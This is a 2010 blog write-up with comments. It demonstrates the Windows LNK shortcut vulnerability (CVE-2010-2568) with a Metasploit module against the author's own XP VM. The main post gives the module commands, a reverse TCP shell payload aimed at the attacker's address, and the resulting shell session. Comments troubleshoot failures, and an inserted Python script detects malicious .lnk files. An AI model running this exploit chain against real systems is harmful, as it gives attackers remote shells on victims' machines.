Ok, so with all the hype surrounding this vulnerability, I figured that I would do a write-up and give an example of how it works. Metasploit, as usual, makes it really simple.
I really consider this to be a social engineering attack, because you need the victim to access a share. Yes, in the right circumstance, they’d stumble upon it themselves without any guidance, but generally this is going to be a “Hey man, check this out!” style attack.
Anyway, let’s start.
UPDATE
Here’s a video demonstrating the process as well. It’s essentially the same as what I’ve documented here, but it’s for those of you who prefer a visual writeup.
You’ll have to view it in full-screen mode in order to really see what’s going on.
Windows LNK vulnerability (CVE-2010-2568) in action from hardez on Vimeo.
First things first, you’ll need the newest Metasploit revision. If you already have Metasploit installed, simply go into the Metasploit directory and type:
$ svn update
This will bring you up to the most current revision.
Next, start the console:
$ msfconsole
Then, choose the exploit module:
msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute
Then choose the payload. I’m going to use a reverse_tcp shell..
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms10_xxx_windows_shell_lnk_execute) > show options
Module options:

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST  0.0.0.0          yes       The local host to listen on.
SRVPORT  80               yes       The daemon port to listen on (do not change)
URIPATH  /                yes       The URI to use (do not change).

Payload options (windows/shell/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port
SRVHOST is the address the module’s WebDAV server binds to, and LHOST is the address the reverse shell connects back to. In this setup both are the attacker’s local IP on the interface the victim can reach; you don’t have to change anything else.
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set lhost 192.168.0.58
lhost => 192.168.0.58
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set srvhost 192.168.0.58
srvhost => 192.168.0.58
msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.58:4444
[*]
[*] Send vulnerable clients to \\192.168.0.58\MSaq\
[*]
[*] Using URL: http://192.168.0.58:80/
[*] Server started.
msf exploit(ms10_xxx_windows_shell_lnk_execute) >
Ok, so now we have our server running, and we want to get a user to browse to it. In my case, since this is just an example, I’ll browse to it myself from my VMware image, which is Windows XP SP2, and here’s what we see on the server side:
[*] Responding to WebDAV OPTIONS request from 192.168.0.252:1101
[*] Responding to WebDAV OPTIONS request from 192.168.0.252:1101
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq
[*] Sending 301 for /MSaq …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/
[*] Sending directory multistatus for /MSaq/ …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq
[*] Sending 301 for /MSaq …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/
[*] Sending directory multistatus for /MSaq/ …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq
[*] Sending 301 for /MSaq …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/
[*] Sending directory multistatus for /MSaq/ …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/desktop.ini
[*] Sending 404 for /MSaq/desktop.ini …
[*] Sending LNK file to 192.168.0.252:1101 …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/DXdrUxgc.dll.manifest
[*] Sending 404 for /MSaq/DXdrUxgc.dll.manifest …
[*] Sending DLL payload 192.168.0.252:1101 …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/DXdrUxgc.dll.123.Manifest
[*] Sending 404 for /MSaq/DXdrUxgc.dll.123.Manifest …
[*] Sending stage (240 bytes) to 192.168.0.252
[*] Command shell session 1 opened (192.168.0.58:4444 -> 192.168.0.252:1111) at Tue Jul 20 13:09:03 -0500 2010
msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions

Active sessions
===============

Id  Type   Information  Connection
--  ----   -----------  ----------
1   shell               192.168.0.58:4444 -> 192.168.0.252:1111

msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>
Hard to get much simpler than that.
I’m intentionally not going into much detail on how to automate this further or how to obfuscate it so it is less obvious to the end user, since I really don’t want to hand-hold ankle biters through the process of abusing it.
Anyway, there are a number of ways this could be used effectively in the field, but it requires a bit of creativity on the part of the attacker (I’m mainly talking about wireless networks). Is this effective? Definitely. Does it warrant raising Infocon? Not in my opinion. Look at all of the other exploits that target Windows and are totally remote, i.e. enter an IP address and hit “exploit”. Those, in my opinion, are far more threatening than this.
All that said, I think this is going to be around for a while and is definitely going to be a popular attack vector. I know I’m going to be using it.
Is your write up incorrect? Shouldn’t it read?
msf > use exploit/windows/browser/ms10_xxx_windows_shell_lnk_execute
Sounds good. I read about this on astalavista.com in the mailing list section; I guess you posted it to Full Disclosure?
Anyhow, good explanation there. Indeed the “media” seems to be overhyping it a bit.
Just thinking about attacks like this and others where users access links/IPs that point to the Metasploit box. Is the link/program/exploit on their side a handler as such, or purely a pointer? If it is purely a pointer, what is stopping you from using an ARP spoof twist and pointing any URL to your Metasploit box?
Yes, it involves access to the network, but there are ways and means. Could this be used to exploit a box without user intervention?
Just a thought between things; I am possibly far off the mark...
@Sie: No, it’s not just a pointer. It’s actually kind of an interesting vulnerability. It only gets executed when Windows renders the icon for a shortcut. I tried a bunch of different methods to get a Windows box to execute the exploit (i.e. net use //whatever/whatever), but, as best I can tell, it needs to be opened with Explorer (not Internet Explorer; however, you can make it work that way, too).
@Larry: Yeah, I posted it to Full Disclosure because I hadn’t seen any other demos of the exploit, so I figured it was relevant. It was as close to spamming as I’m willing to go.
My first post I wrote about this was really, really bashing SANS for their hype of this. After playing with it for awhile and considering the impact this has, I laid off a bit, but I still don’t think they were justified in raising Infocon to yellow. I mean, I get where they’re coming from, but….
@null:

msf > search lnk
[*] Searching loaded modules for pattern ‘lnk’...

Exploits
========

Name                                                Rank       Description
----                                                ----       -----------
windows/browser/ms10_xxx_windows_shell_lnk_execute  excellent  Microsoft Windows Shell LNK Code Execution

msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute
msf exploit(ms10_xxx_windows_shell_lnk_execute) >

No leading “exploit” on my box. Is it different on yours?
@Sie: The other thing is that you can put the .lnk file anywhere and it will execute, but I’m experiencing some problems with this at the moment. I took the .lnk file that was generated by Metasploit and copied it to a USB key (as well as a regular directory on the C:\ drive of my VMware image) and it wouldn’t trigger until I right-clicked on the file. I’m not quite sure why.
Cheers for that, Matt. I hear it is linked to the rendering of the icon? Does this mean that if you change the icon for the LNK file it will become useless?
It appears this Metasploit module doesn’t work against Win 7 Ultimate 32-bit with IE 8: no success, it didn’t get to the manifest file stage. XP SP3 worked beautifully.
@Sie: Negative. It gets executed when Windows follows the shortcut to the program to find the icon in order to render it. So, it doesn’t matter what the icon IS, just so long as Windows is told where to find it. Here are a few links to help understand it. Also, here is Microsoft’s official description:
“The vulnerability exists because Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the icon of a specially crafted shortcut is displayed. This vulnerability can be exploited locally through a malicious USB drive, or remotely via network shares and WebDAV. An exploit can also be included in specific document types that support embedded shortcuts.”
http://www.stdlib.com/art6-Shortcut-File-Format-lnk.html
http://www.securityfocus.com/bid/41732
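Added example, not code from the original post or from Metasploit: a small Python script that triages .lnk files for the shape the reply above describes, an item ID list that walks My Computer -> Control Panel -> a path ending in .dll, and reports whether that DLL sits on a UNC path (network share or WebDAV, as in the Microsoft description). It parses the header flags, the target ID list and the StringData fields, so an ordinary shortcut that merely carries an icon location string is not confused with one that names a DLL inside its ID list. Header offsets and flag bits follow the public shell link format (MS-SHLLINK); the Control Panel and My Computer CLSIDs are the standard shell folder GUIDs; the two fixture builders are constructed test inputs that only approximate the item-list shape (they are not the post’s generated file), and the UNC path reused in the sample is taken from the post’s own WebDAV log.

```python
"""Static triage of Windows shortcut (.lnk) files for the shape described
above: an item ID list that walks My Computer -> Control Panel -> a DLL path,
which makes shell32 load the DLL just to draw the icon.  Added example, not
code from the original post or from Metasploit.  Offsets follow the public
shell link layout (MS-SHLLINK); the fixture builders are constructed test
inputs that only approximate the exploit's item list."""
import re
import struct
import uuid

HEADER_SIZE = 0x4C
LINK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
MY_COMPUTER = uuid.UUID("20d04fe0-3aea-1069-a2d8-08002b30309d")
CONTROL_PANEL = uuid.UUID("21ec2020-3aea-1069-a2dd-08002b30309d")

# LinkFlags bits; STRING_FIELDS is in the order the StringData fields appear
HAS_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80

UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")   # printable UTF-16LE runs


def parse_lnk(data):
    """Return LinkFlags, the raw ItemIDs of the target ID list, and StringData."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or uuid.UUID(bytes_le=bytes(data[4:20])) != LINK_CLSID):
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos, items = HEADER_SIZE, []
    if flags & HAS_TARGET_ID_LIST:
        id_list_size = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        end = pos + id_list_size
        while pos + 2 <= end:
            size = struct.unpack_from("<H", data, pos)[0]
            if size == 0:                       # TerminalID ends the list
                break
            items.append(bytes(data[pos + 2:pos + size]))
            pos += size
        pos = end
    if flags & HAS_LINK_INFO:                   # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    strings = {}
    for bit, name in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = bytes(data[pos:pos + width * count])
            strings[name] = raw.decode("utf-16-le" if width == 2 else "latin-1")
            pos += width * count
    return {"flags": flags, "items": items, "strings": strings}


def triage_lnk(data):
    """Flag a shortcut whose ID list passes through the Control Panel folder and
    then names a .dll; report whether that DLL lives on a UNC path (share/WebDAV)."""
    info = parse_lnk(data)
    via_control_panel = any(CONTROL_PANEL.bytes_le in item for item in info["items"])
    dll_paths = [m.group().decode("utf-16-le")
                 for item in info["items"] for m in UTF16_RUN.finditer(item)
                 if m.group().decode("utf-16-le").lower().endswith(".dll")]
    return {
        "verdict": "suspicious" if via_control_panel and dll_paths else "benign",
        "via_control_panel": via_control_panel,
        "dll_paths": dll_paths,
        "remote_dll": any(p.startswith("\\\\") for p in dll_paths),
        "icon_location": info["strings"].get("icon_location"),
    }


# ---- constructed fixtures for exercising the triage offline ------------------
def _header(flags):
    return (struct.pack("<I", HEADER_SIZE) + LINK_CLSID.bytes_le
            + struct.pack("<I", flags) + bytes(52))


def _item(body):                                # ItemIDSize counts its own 2 bytes
    return struct.pack("<H", len(body) + 2) + body


def build_icon_loader_fixture(dll_path):
    """My Computer -> Control Panel -> DLL-path item; approximates the shape only."""
    id_list = (_item(b"\x1f\x50" + MY_COMPUTER.bytes_le)
               + _item(b"\x2e\x80" + CONTROL_PANEL.bytes_le)
               + _item(b"\x00\x00" + dll_path.encode("utf-16-le") + b"\x00\x00")
               + b"\x00\x00")                   # TerminalID
    return _header(HAS_TARGET_ID_LIST) + struct.pack("<H", len(id_list)) + id_list


def build_plain_shortcut_fixture(icon_path):
    """Ordinary shortcut with only an ICON_LOCATION string and no ID list."""
    return (_header(HAS_ICON_LOCATION | IS_UNICODE)
            + struct.pack("<H", len(icon_path)) + icon_path.encode("utf-16-le"))


# UNC path taken from the WebDAV log in the post above
ATTACKER_UNC = r"\\192.168.0.58\MSaq\DXdrUxgc.dll"

if __name__ == "__main__":
    print("webdav:", triage_lnk(build_icon_loader_fixture(ATTACKER_UNC)))
    print("plain: ", triage_lnk(build_plain_shortcut_fixture(r"C:\Windows\notepad.exe")))
```

To run it against real shortcuts from a USB key or a share, call triage_lnk(open(path, "rb").read()). The verdict is a heuristic: treat via_control_panel and dll_paths as the evidence to review, not as proof on their own, and expect legitimate Control Panel shortcuts to show the CLSID without any DLL path.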
@dutchie86: Hmm.. interesting. Internet Explorer doesn’t really have anything to do with it, to be honest. Once you have the metasploit server running, open up file explorer and type in the address, it should get triggered. If you access the server via Internet Explorer, you should be asked to download a file. If you were to download it, it should get triggered.
Let me know what happens when you try access the share using file explorer.
Hi Matt, when opening the exploit path via Explorer it opens the file share and everything is fine until
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/desktop.ini
[*] Sending 404 for /MSaq/desktop.ini …
Then it just stops, no more traffic etc. I right-click on the .lnk file and no exploit or manifest file is sent; click on the actual link and then the talk starts again from the beginning, except it is for /MSaq/msaq.lnk/desktop.ini etc., and no manifest file or stage 2 is sent. I tried changing the view to thumbnails etc. to no avail.
@dutchie86: Weird dude.. I know that even Microsoft claims that it is vulnerable, but I don’t have a copy of Windows 7 around here to test it on. Maybe someone else will weigh in on the topic.
There is a patch for shell32.dll and it’s not made by Microsoft.
http://nemesis.te-home.net/News/20100723_Patch_for_0day__LNK_file_handling_vulnerability_up.html
@strcmp: Nice.. I hadn’t seen that yet. I guess I’d be a little apprehensive using something not provided by Microsoft, though.
I have no exploitation.
After running the exploit I can get a.dll and b.lnk,
but no session is established.
It stopped at Sending DLL payload 192.168.1.16:1065…
Windows XP SP2 + IE 6.0
I want to know why, and has anyone had the same result?
@elva: Unlike the video, try using explorer.exe rather than IE to access the share and see if it works.
“I guess I’d be a little apprehensive using something not provided by Microsoft”
The patch applies to OS’es no longer supported by Microsoft.
@strcmp: I get that.. but my concerns would be:
1) Who’s providing the patch?
2) Can the provider be trusted?
3) Do they provide the source code of the patch?
And, ultimately.. 4) Is this thing a backdoor?
To be honest, in most circumstances, I would say using a 3rd party patch to fix this problem might expose you to more risks than not patching it at all.
From nemesis.te-home.net:
“This program is a proof of concept and is provided “as is”. Any express or implied warranties are disclaimed. In no event shall the author be liable for any damages caused arising in any way out of the use of this software, even if advised of the possibility of such damage.
License: Creative Commons Attribution.”
After patching, the old shell32.dll is saved as “shell32.backup” in system32\ folder. If you compare shell32.dll with shell32.backup you can notice the patch is only 4 bytes for any Service Pack of Windows XP. Source code for this patch program is included.
If Microsoft no longer provides patches for OS’es that are still in use, we’ll see only 3rd party patches, if any.
@strcmp: Good point.. maybe it’s time for those who are tired of being jerked around by Microsoft to switch to a better operating system. Might I suggest Linux?